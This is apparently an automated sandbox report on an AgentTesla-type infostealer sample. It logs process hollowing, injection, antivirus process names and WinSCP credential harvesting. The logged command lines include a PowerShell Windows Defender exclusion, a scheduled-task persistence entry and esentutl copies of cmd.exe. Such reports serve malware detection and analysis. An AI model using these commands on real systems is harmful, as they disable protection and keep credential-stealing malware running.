Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Process token adjusted: Debug
Source: C:\Users\Public\Libraries\lxsyrsiW.pif Code function: 8_1_004015D7 SetUnhandledExceptionFilter, 8_1_004015D7
Source: C:\Users\Public\Libraries\lxsyrsiW.pif Code function: 8_1_004015D7 SetUnhandledExceptionFilter, 8_1_004015D7
Source: C:\Users\Public\Libraries\lxsyrsiW.pif Code function: 23_1_004015D7 SetUnhandledExceptionFilter, 23_1_004015D7
Source: C:\Users\Public\Libraries\lxsyrsiW.pif Code function: 23_1_004015D7 SetUnhandledExceptionFilter, 23_1_004015D7
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Memory allocated: page read and write | page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion
barindex
Adds a directory exclusion to Windows Defender
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi'
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' Jump to behavior
Allocates memory in foreign processes
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Memory allocated: C:\Users\Public\Libraries\lxsyrsiW.pif base: 400000 protect: page execute and read and write Jump to behavior
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Memory allocated: C:\Users\Public\Libraries\lxsyrsiW.pif base: 400000 protect: page execute and read and write
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Memory allocated: C:\Users\Public\Libraries\lxsyrsiW.pif base: 400000 protect: page execute and read and write
Drops or copies cmd.exe with a different name (likely to bypass HIPS)
Source: C:\Windows\SysWOW64\esentutl.exe File created: C:\Users\Public\alpha.pif Jump to dropped file
Sample uses process hollowing technique
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Section unmapped: C:\Users\Public\Libraries\lxsyrsiW.pif base address: 400000 Jump to behavior
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section unmapped: C:\Windows\SysWOW64\timeout.exe base address: 400000
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section unmapped: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe base address: 400000
Writes to foreign memory regions
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Memory written: C:\Users\Public\Libraries\lxsyrsiW.pif base: 3B2008 Jump to behavior
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Memory written: C:\Users\Public\Libraries\lxsyrsiW.pif base: 3CC008
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Memory written: C:\Users\Public\Libraries\lxsyrsiW.pif base: 3E8008
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Process created: C:\Users\Public\Libraries\lxsyrsiW.pif C:\Users\Public\Libraries\lxsyrsiW.pif Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\cmd.exe /d C:\\Users\\Public\\alpha.pif /o Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\ping.exe /d C:\\Users\\Public\\xpha.pif /o Jump to behavior
Source: C:\Users\Public\Libraries\lxsyrsiW.pif Process created: C:\Users\user\AppData\Local\Temp\neworigin.exe "C:\Users\user\AppData\Local\Temp\neworigin.exe" Jump to behavior
Source: C:\Users\Public\Libraries\lxsyrsiW.pif Process created: C:\Users\user\AppData\Local\Temp\server_BTC.exe "C:\Users\user\AppData\Local\Temp\server_BTC.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Process created: C:\Windows\SysWOW64\schtasks.exe "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe" /st 02:18 /du 23:59 /sc daily /ri 1 /f Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Process created: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmpBC1D.tmp.cmd"" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout 6
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Process created: C:\Users\Public\Libraries\lxsyrsiW.pif C:\Users\Public\Libraries\lxsyrsiW.pif
Source: C:\Users\Public\Libraries\lxsyrsiW.pif Process created: C:\Users\user\AppData\Local\Temp\neworigin.exe "C:\Users\user\AppData\Local\Temp\neworigin.exe"
Source: C:\Users\Public\Libraries\lxsyrsiW.pif Process created: C:\Users\user\AppData\Local\Temp\server_BTC.exe "C:\Users\user\AppData\Local\Temp\server_BTC.exe"
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Process created: C:\Users\Public\Libraries\lxsyrsiW.pif C:\Users\Public\Libraries\lxsyrsiW.pif
Source: C:\Users\Public\Libraries\lxsyrsiW.pif Process created: C:\Users\user\AppData\Local\Temp\neworigin.exe "C:\Users\user\AppData\Local\Temp\neworigin.exe"
Source: C:\Users\Public\Libraries\lxsyrsiW.pif Process created: C:\Users\user\AppData\Local\Temp\server_BTC.exe "C:\Users\user\AppData\Local\Temp\server_BTC.exe"
Contains functionality to query locales information (e.g. system language)
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Code function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA, 0_2_02E65ACC
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Code function: GetLocaleInfoA, 0_2_02E6A7C4
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Code function: lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA, 0_2_02E65BD8
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Code function: GetLocaleInfoA, 0_2_02E6A810
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\SysWOW64\cmd.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\Public\Libraries\lxsyrsiW.pif Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Queries volume information: C:\Users\user\AppData\Local\Temp\neworigin.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Queries volume information: C:\Users\user\AppData\Local\Temp\server_BTC.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Queries volume information: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Windows\SysWOW64\cmd.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\cmd.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Queries volume information: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\Public\Libraries\lxsyrsiW.pif Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Queries volume information: C:\Users\user\AppData\Local\Temp\neworigin.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Queries volume information: C:\Users\user\AppData\Local\Temp\server_BTC.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\Public\Libraries\lxsyrsiW.pif Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Queries volume information: C:\Users\user\AppData\Local\Temp\neworigin.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Queries volume information: C:\Users\user\AppData\Local\Temp\server_BTC.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Queries volume information: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Code function: 0_2_02E6920C GetLocalTime, 0_2_02E6920C
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Code function: 0_2_02E6B78C GetVersionExA, 0_2_02E6B78C
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior
AV process strings found (often used to terminate AV products)
Source: 2jbMIxCFsK.exe, 00000000.00000003.2122962525.000000007ED80000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000003.2121944923.000000007DF00000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000002.2229949049.000000007E8C7000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000003.2121944923.000000007DF87000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: cmdagent.exe
Source: 2jbMIxCFsK.exe, 00000000.00000003.2122962525.000000007ED80000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000003.2121944923.000000007DF00000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000002.2229949049.000000007E8C7000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000003.2121944923.000000007DF87000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: quhlpsvc.exe
Source: 2jbMIxCFsK.exe, 00000000.00000003.2122962525.000000007ED80000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000003.2121944923.000000007DF00000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000002.2229949049.000000007E8C7000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000003.2121944923.000000007DF87000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: avgamsvr.exe
Source: 2jbMIxCFsK.exe, 00000000.00000003.2122962525.000000007ED80000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000003.2121944923.000000007DF00000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000002.2229949049.000000007E8C7000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000003.2121944923.000000007DF87000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: TMBMSRV.exe
Source: 2jbMIxCFsK.exe, 00000000.00000003.2122962525.000000007ED80000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000003.2121944923.000000007DF00000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000002.2229949049.000000007E8C7000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000003.2121944923.000000007DF87000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: Vsserv.exe
Source: 2jbMIxCFsK.exe, 00000000.00000003.2122962525.000000007ED80000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000003.2121944923.000000007DF00000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000002.2229949049.000000007E8C7000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000003.2121944923.000000007DF87000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: avgupsvc.exe
Source: 2jbMIxCFsK.exe, 00000000.00000003.2122962525.000000007ED80000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000003.2121944923.000000007DF00000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000002.2229949049.000000007E8C7000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000003.2121944923.000000007DF87000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: avgemc.exe
Source: 2jbMIxCFsK.exe, 00000000.00000003.2122962525.000000007ED80000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000003.2121944923.000000007DF00000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000002.2229949049.000000007E8C7000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000003.2121944923.000000007DF87000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: MsMpEng.exe

Stealing of Sensitive Information
barindex
Yara detected AgentTesla
Source: Yara match File source: 9.0.neworigin.exe.240000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000018.00000002.4540086325.000000000290C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.2359317927.00000000026B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000002.4540497126.0000000002421000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000018.00000002.4540086325.00000000028E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000018.00000002.4540086325.0000000002914000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000002.4540497126.000000000244C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.2359317927.00000000026E3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.2359317927.00000000026D9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000000.2158684981.0000000000242000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000002.4540497126.0000000002454000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: neworigin.exe PID: 2140, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: neworigin.exe PID: 2164, type: MEMORYSTR
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\neworigin.exe, type: DROPPED
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions Jump to behavior
